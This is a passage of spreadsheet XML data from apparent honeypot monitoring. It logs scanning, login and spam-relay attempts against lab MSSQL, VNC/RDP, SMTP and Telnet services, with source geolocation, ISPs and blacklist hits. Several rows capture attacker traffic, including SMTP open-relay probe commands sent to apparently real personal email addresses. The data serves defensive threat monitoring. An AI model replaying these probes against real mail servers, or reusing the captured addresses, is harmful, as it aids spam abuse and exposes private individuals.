    <s v="110049"/>
    <s v="28.5385"/>
    <s v="77.2905"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="residential"/>
    <s v="BHARTI"/>
    <s v="2006-12-19"/>
    <s v="ABTS-DSl-DEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa1:c496"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2341"/>
    <x v="2341"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T12:45:42"/>
    <d v="2025-04-10T12:43:34"/>
    <d v="2025-04-10T12:45:42"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20309"/>
    <s v="106.845"/>
    <s v="131111"/>
    <s v="PT Mora Telematika Indonesia"/>
    <s v="MORATELINDONAP"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2019-03-01"/>
    <s v="CEPATNET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6787:ded4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2342"/>
    <x v="2342"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T12:39:29"/>
    <d v="2025-04-03T17:47:51"/>
    <d v="2025-04-10T12:39:29"/>
    <n v="348"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900&amp;&amp;44378&amp;&amp;53440&amp;&amp;52971&amp;&amp;52490&amp;&amp;52011&amp;&amp;3389&amp;&amp;49704&amp;&amp;49258&amp;&amp;65211&amp;&amp;64774&amp;&amp;64385&amp;&amp;63999&amp;&amp;62438&amp;&amp;62001&amp;&amp;61563&amp;&amp;61129&amp;&amp;59626&amp;&amp;59194&amp;&amp;58763&amp;&amp;58331&amp;&amp;58405&amp;&amp;58014&amp;&amp;57622&amp;&amp;63185&amp;&amp;62748&amp;&amp;62307&amp;&amp;61854&amp;&amp;60712&amp;&amp;60213&amp;&amp;59711&amp;&amp;59210&amp;&amp;50492&amp;&amp;49979&amp;&amp;49457&amp;&amp;65338&amp;&amp;50026&amp;&amp;49538&amp;&amp;65448&amp;&amp;64973&amp;&amp;63030&amp;&amp;56956&amp;&amp;50106&amp;&amp;59642&amp;&amp;52788&amp;&amp;53055&amp;&amp;62608&amp;&amp;55804&amp;&amp;65350&amp;&amp;51461&amp;&amp;61041&amp;&amp;54281&amp;&amp;63868&amp;&amp;60698&amp;&amp;53939&amp;&amp;63517&amp;&amp;55082&amp;&amp;64660&amp;&amp;57902&amp;&amp;51150&amp;&amp;60740&amp;&amp;65531&amp;&amp;58769&amp;&amp;52005&amp;&amp;61582&amp;&amp;54829&amp;&amp;62552&amp;&amp;55811&amp;&amp;65440&amp;&amp;58983&amp;&amp;52770&amp;&amp;63738&amp;&amp;56998&amp;&amp;50261&amp;&amp;53148&amp;&amp;62947&amp;&amp;56210&amp;&amp;49433&amp;&amp;59082&amp;&amp;52353&amp;&amp;54272&amp;&amp;63877&amp;&amp;57142&amp;&amp;50405&amp;&amp;60023&amp;&amp;53287&amp;&amp;53641&amp;&amp;62907&amp;&amp;56169&amp;&amp;49401&amp;&amp;59058&amp;&amp;52325&amp;&amp;56492&amp;&amp;49765&amp;&amp;59460&amp;&amp;52744&amp;&amp;62390&amp;&amp;58605&amp;&amp;51894&amp;&amp;61538&amp;&amp;54840&amp;&amp;64480&amp;&amp;57777&amp;&amp;59114&amp;&amp;52370&amp;&amp;61977&amp;&amp;55245&amp;&amp;62742&amp;&amp;62826&amp;&amp;50926&amp;&amp;64943&amp;&amp;51097&amp;&amp;54548&amp;&amp;52918&amp;&amp;55806&amp;&amp;64615&amp;&amp;60439&amp;&amp;55572&amp;&amp;57597&amp;&amp;55240&amp;&amp;58815&amp;&amp;59961&amp;&amp;62137&amp;&amp;63036&amp;&amp;50510&amp;&amp;65392&amp;&amp;60979&amp;&amp;60899&amp;&amp;63970&amp;&amp;50650&amp;&amp;53531&amp;&amp;53478&amp;&amp;56461&amp;&amp;56556&amp;&amp;59396&amp;&amp;59600&amp;&amp;53455&amp;&amp;56436&amp;&amp;56609&amp;&amp;59584&amp;&amp;59529&amp;&amp;62528&amp;&amp;62575&amp;&amp;65356&amp;&amp;49346&amp;&amp;51680&amp;&amp;52631&amp;&amp;61530&amp;&amp;54812&amp;&amp;64431&amp;&amp;57720&amp;&amp;51014&amp;&amp;60634&amp;&amp;53934&amp;&amp;49248&amp;&amp;56478&amp;&amp;63686&amp;&amp;61757&amp;&amp;58576&amp;&amp;49430&amp;&amp;56706&amp;&amp;63948&amp;&amp;54845&amp;&amp;61228&amp;&amp;52133&amp;&amp;59388&amp;&amp;50287&amp;&amp;57532&amp;&amp;50427&amp;&amp;57695&amp;&amp;64957&amp;&amp;55874&amp;&amp;63146&amp;&amp;51777&amp;&amp;59119&amp;&amp;50099&amp;&amp;57473&amp;&amp;64820&amp;&amp;55828&amp;&amp;63176&amp;&amp;57931&amp;&amp;65251&amp;&amp;56225&amp;&amp;63558&amp;&amp;54545&amp;&amp;61790&amp;&amp;63051&amp;&amp;54035&amp;&amp;61374&amp;&amp;52362&amp;&amp;61594&amp;&amp;52569&amp;&amp;59900&amp;&amp;50876&amp;&amp;65527&amp;&amp;58202&amp;&amp;56493&amp;&amp;59534&amp;&amp;50504&amp;&amp;65171&amp;&amp;56141&amp;&amp;63464&amp;&amp;58244&amp;&amp;49174&amp;&amp;56527&amp;&amp;63854&amp;&amp;54822&amp;&amp;56881&amp;&amp;64201&amp;&amp;55179&amp;&amp;62519&amp;&amp;53505&amp;&amp;60861&amp;&amp;51841&amp;&amp;64212&amp;&amp;55199&amp;&amp;62546&amp;&amp;53542&amp;&amp;60890&amp;&amp;51875&amp;&amp;53627&amp;&amp;60951&amp;&amp;51926&amp;&amp;59258&amp;&amp;50228&amp;&amp;57551&amp;&amp;64882&amp;&amp;54570&amp;&amp;61921&amp;&amp;52907&amp;&amp;60269&amp;&amp;51261&amp;&amp;49567&amp;&amp;58608&amp;&amp;57482&amp;&amp;64813&amp;&amp;55788&amp;&amp;63120&amp;&amp;54103&amp;&amp;61438&amp;&amp;52422"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="75"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Bucheon-si"/>
    <s v="Bucheon-si (Wonmi-gu)"/>
    <s v="1838716"/>
    <s v="NA"/>
    <s v="37.5064"/>
    <s v="126.803"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79ad:8e05"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2343"/>
    <x v="2343"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T12:29:59"/>
    <d v="2025-04-01T18:14:52"/>
    <d v="2025-04-10T12:29:59"/>
    <n v="45"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Credential Stuffing"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H29"/>
    <s v="25&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="SC"/>
    <s v="South Carolina"/>
    <s v="Charleston"/>
    <s v="North Charleston"/>
    <s v="4589387"/>
    <s v="29405"/>
    <s v="32.867"/>
    <s v="-79.9752"/>
    <s v="214943"/>
    <s v="Railnet LLC"/>
    <s v="Railnet LLC"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2024-01-04"/>
    <s v="VITALKEY-NETWORK"/>
    <s v="2025-03-24"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 1 Apr 2025 05:33:37 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@usa.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mammamwilson@proton.me&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;momoh130@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rubenconvy41@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;thoma1699@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 8 Apr 2025 09:02:22 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '122.170.7.108_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 8 Apr 2025 17:04:59 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;xx@usa.COM&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ubenconvy41@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68f5:f034"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2344"/>
    <x v="2344"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T12:28:42"/>
    <d v="2025-04-10T12:28:42"/>
    <d v="2025-04-10T12:28:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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1:5f40"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2345"/>
    <x v="2345"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:45:06"/>
    <d v="2025-04-10T10:38:00"/>
    <d v="2025-04-10T10:45:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2000-01-11"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d00:8fcf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2346"/>
    <x v="2346"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:42:24"/>
    <d v="2025-04-10T10:40:13"/>
    <d v="2025-04-10T10:42:24"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="NTR"/>
    <s v="Vijayawada"/>
    <s v="1253184"/>
    <s v="520001"/>
    <s v="16.5062"/>
    <s v="80.648"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2010-09-14"/>
    <s v="UPPAL-HYDRABAD-AP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfe6:399"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2347"/>
    <x v="2347"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:40:15"/>
    <d v="2025-04-10T10:40:15"/>
    <d v="2025-04-10T10:40:15"/>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d6:3ddd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2348"/>
    <x v="2348"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:38:16"/>
    <d v="2024-05-23T14:23:50"/>
    <d v="2025-04-10T10:38:16"/>
    <n v="93"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_LDAP_H43&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;54463&amp;&amp;445&amp;&amp;389&amp;&amp;22882&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f0:b74d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2349"/>
    <x v="2349"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:20:41"/>
    <d v="2025-04-10T10:14:13"/>
    <d v="2025-04-10T10:20:41"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:d099"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2350"/>
    <x v="2350"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:13:07"/>
    <d v="2025-03-01T20:13:42"/>
    <d v="2025-04-10T10:13:07"/>
    <n v="13392"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H12"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="215730"/>
    <s v="H2NEXUS LTD"/>
    <s v="H2nexus LTD"/>
    <s v="hosting"/>
    <s v="H2nexus LTD"/>
    <s v="2009-08-27"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d78:893f"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2351"/>
    <x v="2351"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T10:11:26"/>
    <d v="2024-07-01T02:55:00"/>
    <d v="2025-04-10T10:11:26"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;44611&amp;&amp;18338&amp;&amp;80&amp;&amp;389&amp;&amp;22&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;13868&amp;&amp;38015&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="9676"/>
    <s v="SaveCom Internation Inc."/>
    <s v="Savecom International Inc."/>
    <s v="business"/>
    <s v="SAVECOM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d3f:9d9b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2352"/>
    <x v="2352"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T09:58:01"/>
    <d v="2025-04-10T09:58:01"/>
    <d v="2025-04-10T09:58:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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3d00:c696"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2353"/>
    <x v="2353"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-10T09:54:03"/>
    <d v="2025-04-10T09:52:08"/>
    <d v="2025-04-10T09:54:03"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Patna"/>
    <s v="Patna (Police Colony)"/>
    <s v="1260086"/>
    <s v="800001"/>
    <s v="25.5819"/>
    <s v="85.0818"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2011-03-17"/>
    <s v="BHARTI-MO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
